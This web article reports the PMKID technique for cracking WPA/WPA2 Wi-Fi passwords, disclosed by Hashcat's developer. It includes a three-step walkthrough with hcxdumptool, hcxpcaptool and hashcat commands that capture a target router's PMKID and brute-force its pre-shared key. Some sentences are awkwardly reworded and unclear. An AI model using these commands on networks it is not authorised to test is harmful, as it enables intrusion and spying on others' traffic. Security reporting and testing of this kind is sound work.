New PMKID Attack for WPA & WPA2 hacking wifi password
Recently, a security analyst has exposed a new technique to hack WiFi (WPA2 Hacking) that simply let attackers to crack WiFi passwords of most of the routers.
Jens ‘Atom’ Steube, lead developer of Hashcat (a popular password cracking tool), revealed that the new method was discovered accidentally during the analysis of the recently launched WPA3 security standard.
This new technique of cracking WiFi password works explicitly against WPA/WPA2 wireless network protocols with PMKID (Pairwise Master Key Identifier)- based roaming features enabled.
This new WiFi hacking strategy could possibly allow attackers to retrieve the PSK (Pre-shared Key) login passwords, enabling them to hack into your Wi-Fi network and spy on the Internet correspondences.
How to Hack WiFi Password on Laptop using PMKID
According to Steube, in the old WPA2 hacking approach attackers has to wait for someone to login into a network and capture a full 4-way handshake of Extensible authentication Protocol over LAN (EAPOL) which is a network port authentication protocol. Whereas, the new approach doesn’t requires another operator to be on the target network to capture all the login credentials.
Instead, it is performed on the Robust Security Network Information Element (RSN IE) using a single Extensible Authentication Protocol over LAN (EAPOL) frame after requesting it from the access point.
Steps for Cracking WiFi Password
Before proceeding following tools need to be downloaded:
Step 1 — Run ‘hcxdumptool’ tool (v4.2.0 or higher) to request the PMKID from the targeted Access Point and dump the received frame to a file.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
If an Access Point recieves our association request packet and supports sending PMKID, “FOUND PMKID” message will seen after a moment:
Step 2 — Run ‘hcxpcaptool’ to convert the captured data from pcapng format to a hash format accepted by hashcat.
$ ./hcxpcaptool -z test.16800 test.pcapng
Step 3 — Use ‘hashcat’ (v4.2.0 or higher) password cracking tool to obtain the WPA Pre-Shared Key (PSK) password.
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” said Jens ‘Atom’ Steube.
Since the new WiFi hack just conflicts with systems with roaming capacities empowered, clients are prescribed to ensure their WiFi password to be strong enough so it can’t be cracked easily .
For more information visit: Hashcat Forum.